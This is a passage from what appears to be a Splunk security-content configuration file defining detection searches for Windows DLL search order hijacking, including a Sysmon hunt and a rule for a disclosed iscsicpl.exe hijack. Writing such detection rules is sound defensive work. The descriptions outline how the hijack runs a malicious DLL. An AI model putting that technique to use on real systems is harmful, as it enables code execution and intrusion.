["T1574.001", "T1574"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=7 NOT (process_path IN ("*\\system32\\*", "*\\syswow64\\*","*\\winsxs\\*","*\\wbem\\*")) | lookup hijacklibs library AS process_name OUTPUT islibrary | search islibrary = True |rename process_name AS ImageLoaded process_path AS Module_Path | stats count values(parent_process_name) as parent_process_name by _time dest ImageLoaded Module_Path | 
`windows_dll_search_order_hijacking_hunt_with_sysmon_filter` [ESCU - Windows DLL Search Order Hijacking with iscsicpl - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a recently disclosed search ordler DLL hijack in iscsicpl.exe. The malicious DLL must be in a new path and iscsicpl.exe, upon load, will execute the payload. The analytic is restricted to Windows shells. Two proof of concepts were identified and utilized to determine the behavior. The command-line is an option to go after, but most likely identifying a child process off iscsicpl.exe will be more effective. Monitoring for suspicious DLL loads is also an option. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1574.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies a recently disclosed search ordler DLL hijack in iscsicpl.exe. The malicious DLL must be in a new path and iscsicpl.exe, upon load, will execute the payload. The analytic is restricted to Windows shells. Two proof of concepts were identified and utilized to determine the behavior. The command-line is an option to go after, but most likely identifying a child process off iscsicpl.exe will be more effective. Monitoring for suspicious DLL loads is also an option. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. 
The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filtering may be required. Remove the Windows Shells macro to determine if other utilities are using iscsicpl.exe. action.escu.creation_date = 2022-07-29 action.escu.modification_date = 2022-07-29 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows DLL Search Order Hijacking with iscsicpl - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] ac